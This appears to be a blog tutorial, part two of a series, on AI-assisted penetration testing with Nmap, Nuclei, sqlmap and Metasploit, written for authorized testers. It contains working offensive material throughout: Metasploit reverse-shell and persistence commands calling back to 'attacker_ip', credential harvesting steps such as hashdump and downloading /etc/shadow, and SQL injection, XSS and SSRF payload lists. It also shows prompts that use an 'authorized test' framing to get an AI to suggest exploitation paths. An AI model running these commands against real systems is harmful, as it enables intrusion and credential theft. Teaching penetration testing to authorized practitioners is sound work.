AI-Assisted Penetration Testing: Weaponizing Claude, Grok, and Metasploit - Part 2: Vulnerability Discovery & Exploitation

From Intelligence to Action

In Part 1, we built a comprehensive target profile through passive reconnaissance. We identified subdomains, mapped technologies, gathered employee intelligence, and used AI to synthesize attack vectors. Now we weaponize that intelligence.

This phase is where authorized penetration testing diverges sharply from malicious activity. Everything from here forward generates logs, triggers alerts, and leaves forensic traces. You must have explicit written authorization before proceeding.

Scope validation checklist before active testing:

• Written authorization from system owner
• Defined scope (IP ranges, domains, applications)
• Testing window (dates and times)
• Rules of engagement (what’s off-limits)
• Emergency contacts
• Data handling requirements

With authorization confirmed, let’s proceed.

Phase 1: Active Reconnaissance

Active reconnaissance directly interacts with target systems. It’s noisier than passive methods but reveals information that can’t be gathered passively.

Port Scanning with Nmap

Nmap remains the gold standard for network reconnaissance:

# Discovery scan - identify live hosts
nmap -sn -PE -PP -PM -PS21,22,23,25,80,113,443,31339 \
    -PA80,113,443,10042 -oA discovery target_network/24

# Full port scan on discovered hosts
nmap -sS -sV -sC -O -p- --min-rate 1000 \
    -oA full_scan -iL live_hosts.txt

# UDP scan for commonly missed services
nmap -sU -sV --top-ports 100 -oA udp_scan -iL live_hosts.txt

# Vulnerability scanning with Nmap scripts
nmap --script vuln -oA vuln_scan -iL live_hosts.txt

AI-Assisted Analysis:

Rather than manually parsing Nmap output, feed it to Claude:

Here are my Nmap scan results for an authorized penetration test:

[Paste Nmap XML or grepable output]

Analyze these results and:
1. Identify services with known vulnerabilities based on version numbers
2. Flag unusual port/service combinations that suggest misconfiguration
3. Identify potential pivot points (services that might provide network access)
4. Prioritize targets by exploitability and potential impact
5. Suggest specific Metasploit modules or exploit techniques for discovered services

Claude excels at correlating version numbers with CVEs and suggesting exploitation paths that automated scanners miss.

Web Application Discovery

For web applications discovered in reconnaissance, deeper enumeration is required:

# Directory and file brute-forcing with feroxbuster
feroxbuster -u https://target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \
    -x php,asp,aspx,jsp,html,js,json -o ferox_output.txt

# Technology-specific wordlists based on detected stack
# For WordPress
feroxbuster -u https://target.com -w /usr/share/seclists/Discovery/Web-Content/CMS/wordpress.fuzz.txt

# API endpoint discovery
feroxbuster -u https://api.target.com -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt

# Parameter discovery with Arjun
arjun -u https://target.com/api/endpoint -o parameters.json

AI-Assisted Wordlist Generation:

This is where AI dramatically accelerates testing. Ask Claude to generate targeted wordlists:

Based on my reconnaissance of [Target Company]:
- Industry: Financial Services
- Technology: React frontend, Node.js backend, PostgreSQL
- Domain naming pattern: [examples from subdomain list]
- Company name: ACME Financial
- Products: Trading platform, Portfolio management

Generate custom wordlists for:
1. Likely API endpoints (RESTful patterns common in fintech)
2. Admin panel paths
3. Backup/config files that might be exposed
4. Likely parameter names for financial applications

Claude will generate context-aware wordlists far more effective than generic ones:

# API Endpoints for Fintech
/api/v1/accounts
/api/v1/transactions
/api/v1/portfolios
/api/v1/trades
/api/v1/orders
/api/v1/users/profile
/api/v1/auth/login
/api/v1/auth/refresh
/api/v2/webhooks
/internal/metrics
/internal/health
/admin/users
/admin/audit-log

# Parameter names
account_id
portfolio_id
transaction_id
user_id
auth_token
api_key
start_date
end_date
amount
currency
symbol
...

Phase 2: Vulnerability Scanning

With active reconnaissance complete, we systematically identify vulnerabilities.

Nuclei - Template-Based Scanning

Nuclei is the modern vulnerability scanner of choice—fast, template-based, and community-maintained:

# Update templates
nuclei -ut

# Full scan with all templates
nuclei -l targets.txt -t ~/nuclei-templates/ -o nuclei_results.txt

# Targeted scans by severity
nuclei -l targets.txt -s critical,high -o critical_findings.txt

# Technology-specific scanning
nuclei -l targets.txt -tags wordpress,apache,nginx -o tech_vulns.txt

# CVE-specific scanning
nuclei -l targets.txt -tags cve -o cve_findings.txt

Custom Template Generation with AI:

When you discover custom applications, generate targeted Nuclei templates:

I found a custom login page at https://app.target.com/auth/login

The page:
- Accepts POST requests with 'email' and 'password' parameters
- Returns JSON responses
- Uses JWT tokens stored in localStorage
- Has a "forgot password" flow at /auth/reset

Generate Nuclei templates to test for:
1. SQL injection in login parameters
2. Username enumeration via response differences
3. Password reset token predictability
4. JWT implementation weaknesses
5. Rate limiting bypass

Claude will generate ready-to-use Nuclei YAML templates.

Nikto and Web-Specific Scanners

# Nikto for comprehensive web server scanning
nikto -h https://target.com -o nikto_output.html -Format htm

# WPScan for WordPress sites
wpscan --url https://target.com --enumerate vp,vt,u \
    --api-token YOUR_API_TOKEN -o wpscan_output.txt

# SQLmap for SQL injection testing (only against confirmed vulnerable parameters)
sqlmap -u "https://target.com/search?q=test" --batch --dbs

Phase 3: Vulnerability Analysis with AI

Raw scanner output is noisy. AI transforms it into prioritized, actionable intelligence.

Triage and Prioritization

Prompt to Claude:

I've completed vulnerability scanning for an authorized penetration test.
Here are the findings:

[Paste Nuclei/Nikto/Nmap vulnerability output]

Triage these findings:

1. CRITICAL - Immediately exploitable for significant impact
2. HIGH - Exploitable with minimal prerequisites
3. MEDIUM - Requires chaining or specific conditions
4. LOW - Informational or difficult to exploit
5. FALSE POSITIVE - Likely scanner error

For each finding, provide:
- Exploitation difficulty (Easy/Medium/Hard)
- Potential impact
- Recommended Metasploit module or manual technique
- Detection likelihood (how noisy is exploitation)
- Suggested remediation

Attack Chain Development

The real power of AI is identifying attack chains—sequences of lower-severity vulnerabilities that combine for high impact:

Based on my findings:
- Exposed Tomcat manager at /manager (default credentials failed)
- Information disclosure revealing internal IP scheme
- SSRF vulnerability in PDF generator
- Outdated jQuery (XSS sink)
- Session cookies without HttpOnly flag

Identify potential attack chains that combine these findings.
For each chain:
1. Describe the sequence of exploitation
2. What's the ultimate impact?
3. What's the detection likelihood at each step?

Claude might identify:

Attack Chain: SSRF to Internal Network Pivot

1. Use SSRF in PDF generator to scan internal network (reveals Tomcat manager on internal IP)
2. SSRF to access internal Tomcat manager (may have weaker auth internally)
3. Deploy webshell via Tomcat manager
4. Pivot to internal network

Impact: Full internal network access
Detection: Medium - SSRF requests may be logged, internal access less monitored

Phase 4: Exploitation with Metasploit

Metasploit Framework is the standard tool for exploitation validation. Here’s how to use it effectively with AI assistance.

Metasploit Fundamentals

# Start Metasploit
msfconsole

# Search for relevant modules
msf6> search type:exploit platform:linux apache
msf6> search cve:2021-44228  # Log4Shell

# Select and configure a module
msf6> use exploit/multi/http/apache_normalize_path_rce
msf6> show options
msf6> set RHOSTS target.com
msf6> set RPORT 443
msf6> set SSL true
msf6> set LHOST attacker_ip
msf6> set LPORT 4444

# Select payload
msf6> show payloads
msf6> set PAYLOAD linux/x64/meterpreter/reverse_tcp

# Validate before exploiting
msf6> check

# Execute
msf6> exploit

AI-Assisted Module Selection

When you have vulnerability scan results but aren’t sure which Metasploit module applies:

I found the following vulnerability during authorized testing:

Service: Apache Tomcat 9.0.30
Vulnerability: CVE-2020-1938 (Ghostcat - AJP File Read/Include)
Port: 8009 (AJP) is open

Provide:
1. The exact Metasploit module(s) that exploit this
2. Required configuration options
3. Expected outcome (file read vs. RCE)
4. Post-exploitation steps if successful
5. Alternative manual exploitation methods

Claude will provide:

## Metasploit Module
exploit/linux/http/tomcat_ghostcat

## Configuration
set RHOSTS target.com
set RPORT 8009
set FILENAME /WEB-INF/web.xml  # Start with this for config disclosure
set LHOST your_ip
set LPORT 4444

## Expected Outcome
File read vulnerability - can read files within web application.
For RCE, requires:
- File upload capability elsewhere in application
- Or writable location in web root

## Post-Exploitation
1. Read /WEB-INF/web.xml for credentials
2. Read other config files (database.properties, etc.)
3. Look for credential reuse

## Manual Exploitation
# Using ajpycat
python3 ajpycat.py read -f /WEB-INF/web.xml target.com 8009

Web Application Exploitation

For web application vulnerabilities, Metasploit provides numerous modules:

# SQL Injection exploitation
msf6> use auxiliary/sqli/oracle/dbms_cdc_subscribe_activate_subscription
msf6> use exploit/multi/http/wp_responsive_thumbnail_slider_upload

# File upload vulnerabilities
msf6> use exploit/multi/http/wp_file_manager_rce

# Deserialization attacks
msf6> use exploit/multi/misc/java_jmx_server
msf6> use exploit/multi/http/struts2_content_type_ognl

# Authentication bypass
msf6> use auxiliary/scanner/http/tomcat_mgr_login

Phase 5: Web Application Testing Deep Dive

Web applications are the most common entry point. Here’s the systematic approach.

Burp Suite Integration

Burp Suite Community Edition provides essential web testing capabilities:

# Proxy Configuration
1. Set browser proxy to 127.0.0.1:8080
2. Install Burp CA certificate in browser
3. Browse target application to build site map

# Active Scanning Approach
1. Spider the application (Discover content)
2. Review site map for interesting endpoints
3. Send requests to Repeater for manual testing
4. Use Intruder for parameter fuzzing

AI-Assisted Request Analysis:

Copy interesting requests from Burp and ask Claude to analyze them:

Here's an HTTP request from my authorized pentest:

POST /api/v1/users/profile HTTP/2
Host: app.target.com
Authorization: Bearer eyJ0eXAiOiJKV1Q...
Content-Type: application/json

{"user_id": "12345", "action": "update", "data": {"email": "test@test.com"}}

Analyze for vulnerabilities:
1. IDOR - Can I access other users by changing user_id?
2. Parameter pollution - What happens with duplicate parameters?
3. JWT attacks - What can I try against this token?
4. Mass assignment - Can I add admin fields?
5. Injection points - Where might input be processed unsafely?

Common Vulnerability Classes

SQL Injection Testing:

# Automated with sqlmap
sqlmap -u "https://target.com/api/search?q=test" \
    --headers="Authorization: Bearer TOKEN" \
    --batch --dbs --level 3 --risk 2

# Manual testing payloads (ask Claude to generate context-specific ones)
' OR '1'='1
' UNION SELECT NULL,NULL,NULL--
'; WAITFOR DELAY '0:0:5'--

Cross-Site Scripting (XSS):

// Reflected XSS test payloads
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg/onload=alert(1)>
javascript:alert(1)

// DOM-based XSS sources
location.hash
document.URL
document.referrer
window.name

Server-Side Request Forgery (SSRF):

# Test payloads
http://127.0.0.1:22
http://169.254.169.254/latest/meta-data/  # AWS metadata
http://metadata.google.internal/           # GCP metadata
file:///etc/passwd
dict://localhost:11211/stat               # Memcached
gopher://localhost:6379/_INFO             # Redis

Insecure Direct Object Reference (IDOR):

# Original request
GET /api/users/12345/documents

# IDOR tests
GET /api/users/12346/documents  # Another user's ID
GET /api/users/1/documents      # Admin likely user ID 1
GET /api/users/*/documents      # Wildcard
GET /api/users/../admin/documents  # Path traversal

Phase 6: Post-Exploitation Reconnaissance

When exploitation succeeds, post-exploitation determines actual impact.

Meterpreter Essentials

# System information
meterpreter> sysinfo
meterpreter> getuid
meterpreter> getpid

# Network information
meterpreter> ipconfig
meterpreter> route
meterpreter> arp

# File system exploration
meterpreter> pwd
meterpreter> ls
meterpreter> cat /etc/passwd
meterpreter> download /etc/shadow

# Credential harvesting
meterpreter> hashdump
meterpreter> run post/linux/gather/hashdump
meterpreter> run post/multi/gather/ssh_creds

# Privilege escalation
meterpreter> getsystem
meterpreter> run post/multi/recon/local_exploit_suggester

# Persistence (with authorization)
meterpreter> run persistence -X -i 60 -p 4444 -r attacker_ip

# Pivoting
meterpreter> run autoroute -s 192.168.1.0/24
meterpreter> background
msf6> use auxiliary/server/socks_proxy
msf6> set SRVPORT 1080
msf6> run

AI-Assisted Post-Exploitation Analysis

When you have shell access, ask Claude for guidance:

I have shell access to a Linux server (Ubuntu 20.04) via reverse shell.
Current user: www-data
The server appears to be a web application server.

Provide a post-exploitation checklist:
1. What information should I gather for the pentest report?
2. How do I identify potential privilege escalation paths?
3. What lateral movement opportunities should I look for?
4. Where are credentials typically stored on this OS?
5. What evidence of this access should I document?

Claude will provide a systematic approach to maximize the value of the access while maintaining professional standards.

Phase 7: Documentation and Evidence

Professional penetration testing requires meticulous documentation.

Screenshot Everything

# Automated screenshot on exploitation
meterpreter> screenshot

# Terminal recording with script
script -a pentest_session_$(date +%Y%m%d_%H%M%S).log

Structured Findings Format

For each finding, document:

## Finding: SQL Injection in User Search

**Severity**: Critical
**CVSS Score**: 9.8

### Location
- URL: https://app.target.com/api/v1/users/search
- Parameter: `q`
- Method: GET

### Description
The user search endpoint is vulnerable to SQL injection via the `q`
parameter. The application directly concatenates user input into SQL
queries without parameterization or input validation.

### Proof of Concept
Request:
GET /api/v1/users/search?q=admin'%20OR%20'1'='1 HTTP/2
Host: app.target.com
Authorization: Bearer [token]

Response:
HTTP/2 200 OK
{"users": [<all users returned>]}

### Impact
- Full database read access
- Potential database modification
- Authentication bypass
- Credential theft

### Remediation
1. Use parameterized queries/prepared statements
2. Implement input validation (allowlist approach)
3. Apply least-privilege database permissions
4. Enable database query logging

### References
- OWASP SQL Injection: https://owasp.org/www-community/attacks/SQL_Injection
- CWE-89: https://cwe.mitre.org/data/definitions/89.html

AI-Generated Attack Narratives

For executive summaries, AI excels at translating technical findings into business impact:

I completed a penetration test with these findings:
- SQL injection (Critical)
- Exposed admin panel with default credentials (High)
- Missing rate limiting on authentication (Medium)
- Information disclosure via error messages (Low)

Generate an executive summary that explains:
1. What an attacker could do with these vulnerabilities
2. Real-world scenarios of similar breaches
3. Business impact in terms executives understand
4. Prioritized remediation roadmap

Key Takeaways for Part 2

1. Active scanning generates logs and alerts—ensure authorization is documented and testing windows are communicated.

2. AI accelerates every phase—from generating targeted wordlists to triaging vulnerabilities to identifying attack chains.

3. Metasploit remains the standard for exploitation validation, but AI helps select and configure the right modules.

4. Attack chains matter more than individual findings—AI excels at identifying how low-severity issues combine into critical risks.

5. Documentation is non-negotiable—professional pentest reports require structured evidence that AI can help organize.

What’s Next

In Part 3, we flip perspectives. We’ll cover:

• How blue teams detect these techniques
• Building detection rules for AI-assisted attacks
• Security architectures that resist these attack patterns
• The strategic implications for CISOs
• Action items for organizations facing this threat landscape

The goal: translate offensive knowledge into defensive strategy.

Tools Reference

Part 3 covers defense. Understanding offense is prerequisite to building resilient systems. Read Here